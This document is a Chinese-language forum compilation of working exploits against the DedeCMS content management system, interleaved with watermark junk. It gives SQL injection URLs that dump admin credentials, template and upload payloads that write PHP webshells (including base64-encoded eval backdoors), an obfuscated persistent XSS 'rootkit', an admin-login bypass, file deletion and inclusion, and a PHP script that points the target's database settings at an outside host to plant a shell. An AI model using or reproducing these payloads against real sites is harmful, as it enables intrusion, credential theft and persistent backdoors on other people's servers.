dedecms漏洞总结

admin

Dedecms 5.6 rss注入漏洞
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
6 q: Z: j" r& R
2 [% d# d  l7 H8 s. I

# u: I& n" E! b+ l# J, `




, @9 o6 \/ O% ^DedeCms v5.6 嵌入恶意代码执行漏洞
注册会员，上传软件：本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
  F- |) ~; |; t- o1 ~$ {9 ~, L4 r发表后查看或修改即可执行
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
2 p! _( T3 u/ y( \生成x.php 密码xiao，直接生成一句话。
) j; @1 q8 V3 K6 F" M


; H- Q' ~- R, [& M2 f. ?) T
4 d/ I3 |  S" [
. q9 l. s& X7 e( |
$ X' }4 `0 f" G/ S
4 }. S9 L, i: I- K
. y5 e" B/ q3 p' ZDede 5.6 GBK SQL注入漏洞
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
1 M; W+ n$ f$ Nhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
/ K  B* s! Y0 z: A


: x* x5 w8 Y4 y$ p, S/ ?



0 K, D1 p- i7 `2 Y
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
' ~. W" C8 g/ R$ X& m4 u5 C




+ t' w. w) m4 r2 r% K' Y
2 u$ W! w' G) b" M  VDEDECMS 全版本 gotopage变量XSS漏洞
1.复制粘贴下面的URL访问，触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞，需关闭XSS筛选器。
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="


+ w' H) [5 A5 ]" O$ g8 I/ N9 [3 F1 Q2.关闭浏览器，无论怎么访问下面的任意URL，都会触发我们的XSS。
' T7 ]- p+ U# F  U8 dhttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda


http://v57.demo.dedecms.com/dede/login.php
# @, F+ Z- |$ L. r7 j+ M$ W3 h

color=Red]DeDeCMS(织梦)变量覆盖getshell
; W6 y' o3 u2 U  Q+ P#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
( M+ h; r3 T1 n! b) j6 y* o, fprint_r('
DEDEcms Variable Coverage
3 i* _0 F2 s" K2 m, p9 `9 I  `7 aExploit Author: www.heixiaozi.comwww.webvul.com
);
. d+ v9 g. I! N' g4 z2 Q  F5 ~echo "\r\n";
if($argv[2]==null){
print_r('
# D' r( f0 C& r9 f+---------------------------------------------------------------------------+
6 {. F; D7 b& b7 E# S% v! NUsage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
% H  D9 J; n& xphp '.$argv[0].' www.site.com 1 old
. P0 [, Z; o* X1 [+---------------------------------------------------------------------------+
& x  y7 z7 |3 L8 f');
exit;
}
# o4 b2 X5 V1 I, l- D$url=$argv[1];
) P' @; \- @9 w$ j: Z$aid=$argv[2];
$path=$argv[3];
7 C. k0 q8 \0 r% L9 i! |7 o/ E( _$exp=Getshell($url,$aid,$path);
3 {8 S$ M0 H- V8 [if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
  ?: |3 s* r8 ?; XShell:".$url."/$path/data/cache/fuck.php\n" ;

. @5 e& H) K/ ~# M! d
if($aid==2)echo "
; a# q2 n" F) O1 tShell:".$url."/$path/fuck.php\n" ;
0 \6 o# }' `, R( f" R+ H
1 n7 S+ ^; G& d3 ^$ z
( b* X3 T3 b; j, @0 \0 z4 ]% v: Rif($aid==3)echo "
( F* [5 ?7 e/ WShell:".$url."/$path/plus/fuck.php\n";

" l! q  T! A/ v
}else{
" X; L4 V2 _7 F% ]9 I6 L, Hecho "
9 P7 y) u& |# b# z9 r6 I1 G* ^Exploit Failed \n";
4 N) l  i* J# {8 z- y# @) e}
function Getshell($url,$aid,$path){
$id=$aid;
, l  H/ E6 x$ X& R  _$host=$url;
$port="80";
. U0 ?( H6 J9 K6 X6 e$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
7 [) e3 g  K% N/ `5 n5 @* w+ \5 W$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
% j8 B  s# b+ S5 N+ v$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
4 Y! H0 O/ f( x  A6 k& e$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
3 @' @3 a! w+ d//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
* Q1 c; n$ t3 N" zNo response from ".$host."\n";
& G* O7 y2 m1 S7 `9 ~7 L}
fwrite($ock,$data);
. r6 e6 n  }5 ]  Y. ]while (!feof($ock)) {
* p  b. t6 d7 I8 G- h3 T, I$exp=fgets($ock, 1024);
return $exp;
) j! ^0 f4 W0 X8 g}
2 ?: j3 k$ \+ [) `8 {}
0 |; y4 e4 k0 K1 J0 K, H. I# J

?>
& V& x& Z) h, ?  ]2 w
1 m- g, q. M* U% m+ V
0 L  {& k; {! @
- `& l% J2 u  {

! H  y8 D: w. l$ Y/ l! i
# z* ~8 _8 c. l9 `4 B9 z



" l2 f0 ]# q' r! k5 g, N* r$ ?# `DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
0 U3 ~) N2 f* f% X$ T; ?
& D! U9 g7 {3 H
  g# S& n- K) Y. X9 ?把上面validate=dcug改为当前的验证码，即可直接进入网站后台
2 E8 c+ Z4 L* k7 Q' Y% q
) O- a" G' i# U& n, _  L
) k6 P9 [# z6 x! A: v# e* U此漏洞的前提是必须得到后台路径才能实现



6 O, k  B1 |8 |! c+ d4 Y" ^$ c

0 ?% u/ L  D" H! ~. H6 [- W
8 i% C' l7 `7 R0 C% N3 Z


- j% G( R6 k% A
6 c) {3 R& J, u. ]Dedecms织梦 标签远程文件写入漏洞
/ W$ o% c/ T! t' K前题条件，必须准备好自己的dede数据库，然后插入数据： insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
; C5 Z/ b' B+ p0 R0 X5 ?0 a

再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。
4 i6 K/ V6 E. e: C( U<form action="" method="post" name="QuickSearch" id="QuickSearch">
8 i  k0 |& S" ?& D, ]4 Y1 v<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
( ?4 b; b& }: C7 K" n! G( i$ f<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
! E5 J: d4 n6 P<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
; J) G1 L9 F5 `2 F5 |4 |- X5 t<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
1 y+ J" C* K. Z4 v<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
" U. t1 f6 ]% t) Q) t& P<script>
" e( r' n3 h0 ?7 P; Cfunction addaction()
! \$ d: M  e8 i3 M' K{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
1 o3 u7 Y/ _, |1 C$ a9 L# a( L
- J% E) D, l% x- a

4 Z: y, ~5 K2 d: |

% Z2 S0 ~+ g4 Q: {, c; o# g4 d" r




, Q5 H& H6 W  a+ h9 \DedeCms v5.6 嵌入恶意代码执行漏洞
9 v" t: q( d8 I7 R: o注册会员，上传软件：本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，发表后查看或修改即可执行
$ ^, g4 R+ M8 A2 `$ W5 |a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成x.php 密码：xiao直接生成一句话。密码xiao 大家懂得
& O& Y# r: U; N/ vDedecms <= V5.6 Final模板执行漏洞
" S) z: B$ j$ r' r) d注册一个用户，进入用户管理后台，发表一篇文章，上传一个图片，然后在附件管理里，把图片替换为我们精心构造的模板，比如图片名称是：
- H& `% f$ Q( \% S/ X2 n5 L% Puploads/userup/2/12OMX04-15A.jpg

  [& k- c8 [3 ^
模板内容是（如果限制图片格式，加gif89a）：
* i0 L2 _! z5 S  \9 O4 {- R{dede:name runphp='yes'}
5 Q+ y7 V( i  {8 k$ l1 X$fp = @fopen("1.php", 'a');
3 ~* A+ O2 N3 P& S@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
% g) r5 c# ?) l: @. [@fclose($fp);
  ]& ?0 c  d! B2 p{/dede:name}
4 r' Q% n; _1 T# m) w5 e) J: @2 修改刚刚发表的文章，查看源文件，构造一个表单：
5 r. i4 s4 H' T$ o3 e% W. T<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
+ r& r* @# I# l<input type="hidden" name="channelid" value="1" />
6 W( u6 u5 t& e- c9 |2 `0 A<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
* P' Z& Z8 R+ {6 d9 ~/ d7 `
. X% n& x' N( e$ n$ `
, Y' B+ p4 c1 s, B1 a<div id="mainCp">
; F: [. y' l' f0 L- t<h3 class="meTitle"><strong>修改文章</strong></h3>
7 W  `: ^- M# d: G

. L) B2 a8 R4 G% I<div class="postForm">
<label>标题：</label>
+ r! z) j: K# G$ k- g<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

& Q% X% Z8 Q' U* x) D# h! K
" D' ]7 x* q  L# ]1 f$ u' o0 G6 H' B<label>标签TAG：</label>
8 a# b  I/ j3 a2 W# q+ z" Y' N<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
+ V1 \( H( p! d% |. \8 x; d

9 ^  ]) E6 `* Q8 Q- s" W+ E! Q<label>作者：</label>
, ~# l! q7 o% x6 e7 o( L<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
* v1 q+ J' D% N+ e8 V
9 V4 ]: d1 r: }- C* F3 |' W+ u
<label>隶属栏目：</label>
( \1 ~% m: \, s$ j<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
! }" v+ k; h5 O7 D

<label>我的分类：</label>
3 V# \7 h5 x! f, M) r<select name='mtypesid' size='1'>
' e# A/ B' q+ B5 H  j' a<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
5 X5 |& }, h. b9 H: K% M8 I</select>
( z; q/ g4 c0 u: D, Y2 Y  Z
4 B9 R) D  Q" N( O5 ]
<label>信息摘要：</label>
( n* Z4 D/ r' q1 x+ A7 f0 T<textarea name="description" id="description">1111111</textarea>
! _* C0 C, a  k7 i( z& e8 I(内容的简要说明)

8 H0 `# o  w- J4 r, j
1 g- t' E2 J' |<label>缩略图：</label>
7 @) W! [- w3 i4 c$ R<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>


7 u. j0 Q, Q) q<input type='text' name='templet'
value="../ uploads/userup/2/12OMX04-15A.jpg">
6 {$ s. |# v3 ?+ P  l+ ^<input type='text' name='dede_addonfields'
, D4 f) w1 M/ a* }value="templet,htmltext;">（这里构造）
! E0 N  z& _  O! }1 e</div>
" n# |: E; G1 z" @
4 Y3 ?" v  n* I9 ?; G: x; q
<!-- 表单操作区域 -->
) m6 n1 @6 n9 M0 u<h3 class="meTitle">详细内容</h3>


! }6 g8 A6 u  H<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
5 j" X" G: \9 o4 y; D) K' f/ d. l
8 X# d5 [, d4 n  N1 _# k: @
<label>验证码：</label>
2 W! u* G4 f5 a# |7 F, R<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
9 k! M! l- i& |- k9 Z5 q<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清？点击更换" align="absmiddle" style="cursor:pointer" />


8 P0 R$ A& ^; U3 k' f( U1 I& i<button class="button2" type="submit">提交</button>
2 ^2 G& s! T9 Q" g5 d$ C) g<button class="button2 ml10" type="reset">重置</button>
+ K* M3 J: w# n) V2 ^* y</div>
  ^3 S+ j- S* ^3 v3 }

/ R  k: S1 j( \8 Y$ l</div>

$ M" y2 t+ K% D7 R/ A
3 E4 A* Z% {5 R. W5 {</form>

; H/ f3 [8 g8 t0 N! |8 m
提交，提示修改成功，则我们已经成功修改模板路径。 3 访问修改的文章：
假设刚刚修改的文章的aid为2，则我们只需要访问：
8 i% I( J0 o0 w5 V0 {http://127.0.0.1/dede/plus/view.php?aid=2
  y$ y) h1 L& R7 h0 t5 f- Q即可以在plus目录下生成webshell：1.php

2 j, z4 `; t9 ^5 Z; \8 }2 ?% P
% W0 T/ Q. e2 i- W6 J$ A- X; G


8 T# }3 m) e0 ~  c. @* h1 Z! ~; `
/ `8 F' J$ f1 ^9 W' X* a$ [: h
& z/ a! q) x' B3 u




6 y8 J' M- N9 m1 L9 q2 nDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
$ R! U5 T* u9 b/ Q; Y( BGif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
/ G" A, ^, y7 ~; k4 G/ T9 X{/dede:field}
) m5 |: c+ r% q2 B0 p保存为1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
7 m) q  h" ]% u( @- e<input type="hidden" name="aid" value="7" />
# @5 A( O, k; J5 ~2 N* U$ k8 T<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
' Y1 o% G- j! H/ C: d4 `7 S<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
1 L  d# `3 M4 r; A% T) q1 g. x<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
' U" \$ x+ V4 v3 ]8 x/ x) R

构造如上表单，上传后图片保存为/uploads/userup/3/1.gif
发表文章，然后构造修改表单如下：

- p; a5 n) j- O: ]1 S
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
7 R, s) T& D/ N" M* W/ ~, C! W<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
; h) i7 x" K0 S& H; J<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
  X: E" W& U+ R7 k7 ~" {<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
6 K- ~1 N  B* G( G0 Y<input type="hidden" name="sortrank" value="1282049150" />
: |" S' R/ c7 C& X<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
2 [, u' V* ^; D! m7 ^) b<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
% D" u* y/ `( N( g- ?# \<option value='1' class='option3' selected=''>Test</option>
1 ]  s6 t" W3 V" X6 A8 W<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
& d# l  s) }, ?) t6 w<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
) q9 @8 h( `* d! V5 q9 h<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
$ J) ?2 H( c! U& [: F6 L9 ]<button class="button2" type="submit">提交</button>
</form>
1 V8 v' L7 U- V- Z* h! {: z2 o
& i4 a; f# K, T, }% j/ a
: i" U' S; {# p9 m$ ^: {1 B

+ Z5 E$ ?  S9 B% k

: O! p3 z4 b% P4 H- e
3 ]" o( O" ~8 O# t  k8 G

6 W# P3 C" O* j8 r

' @' ^4 q/ ~. L
1 |( ~% G8 [" s+ O; Y. @& k- f织梦(Dedecms)V5.6 远程文件删除漏洞
% ^/ v/ m& E& G: N0 l" w& ihttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
5 C, R3 K  S, l
6 l* C, ~& @8 j6 m
( F+ G$ f/ E2 M3 s  Q0 t
( T6 d- N5 q4 T  s9 a

* z9 k  N& q3 `7 J. x
# ]; ?$ M2 w" c# n" Y
4 Y- w# i8 z. z1 o/ |/ s5 L
5 i5 z- {6 [9 x; X' T* Z' J  G

织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
9 J: l) u% D, J6 rhttp://www.test.com/plus/carbuya ... urn&code=../../





' ^3 \6 b! v. e4 U# u
3 r# G/ S% ^4 F- W+ @



DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
密码是32位MD5减去头5位，减去尾七位，得到20 MD5密码，方法是，前减3后减1，得到16位MD5
3 Z2 l2 E, E4 F# W6 I* [
5 d1 G! {+ R  }" O# s' x2 J/ Z; l1 l
  z3 h: d. |3 B1 {$ q


4 ]' f7 D! y' a5 R% u; j1 p1 v

* ~* W, q- e+ u6 s! u% L6 m

- T* d1 ], C/ [, S1 u
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='



: I; r! W3 C9 Y- o1 D  Q  G






织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
) D6 n/ g" V) u/ `( @% O0 O6 Y+ P<html>
) a6 ?/ ^1 C" l+ c<head>
* ^/ V) @$ e& ]% _: o<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
, _1 g* r: |. ]% ^" C+ H---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
# }6 I% p( G3 C<input type='hidden' name='activepath' value='/data/cache/' />
' o* t4 v0 q& h$ Q* M% L+ a+ x$ q$ ]<input type='hidden' name='cfg_basedir' value='../../' />
# \: S0 ^6 T8 F+ o; [<input type='hidden' name='cfg_imgtype' value='php' />
2 D( b) B/ ~  `<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
* R4 Z4 K4 N7 X8 N2 A9 U; H<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
% S4 J- O0 v  \: ?; ?# S</form>
: V4 c  J: N) S% B1 R# c/ h1 s<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
2 m6 S; d8 C4 UFun the game,get a webshell at /data/cache/fly.php...<br />
# N9 k7 F% c3 _) ^- z# ^' U* W8 f</body>
( C) i6 _' `+ Z" ~1 `</html>


7 S- w' J3 y8 q$ l4 {
) m( e. U* ^* P! B1 N( W

: }7 Z5 C( `0 _1 i8 [' y/ X
+ }! I8 P5 B( D3 S( R

/ @! K: ]8 ~1 j$ ^) U$ r! u2 J
( f  ?3 c- h( c5 m2 a
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
2 d7 L0 q! `' c: O* m# ~$ P) F8 ~利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
: |& w- E; M$ r0 Q1 A1. 访问网址：
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
可看见错误信息
7 O" w, F( f% F$ P! Z2 B+ p- A

$ D* x' E/ t1 C. }# I6 y2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
int(3) Error: Illegal double '1024e1024' value found during parsing
) z4 ]9 U+ C- G) [+ W: D( sError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
& U# b3 g& K* P/ c$ j& P
0 H* _' x% R! u5 c# N9 z/ f
( D! M2 i( t+ S# v8 w+ W3. 执行dede.rar里的文件 test.html，注意 form 中 action 的地址是
! y; t3 k, ^; q: [2 ?' u& \( S

<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>

0 _% \: @2 Z  l3 B1 h8 r
按确定后的看到第2步骤的信息表示文件木马上传成功.
+ S* }% s; ~. a% m2 Q+ `  e- L
, D" |% x/ |  l% H( c. k. f
9 d0 y0 q! ~% ~



% R) ^4 T/ @$ I  o5 Q" ]5 ]& _3 r
0 g' I& k8 f% j" n  Y
; J# J0 ~  l: t# m# Y

& Q6 S$ ]' w# W2 ?" o' D* ^

织梦(DedeCms)plus/infosearch.php 文件注入漏洞
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*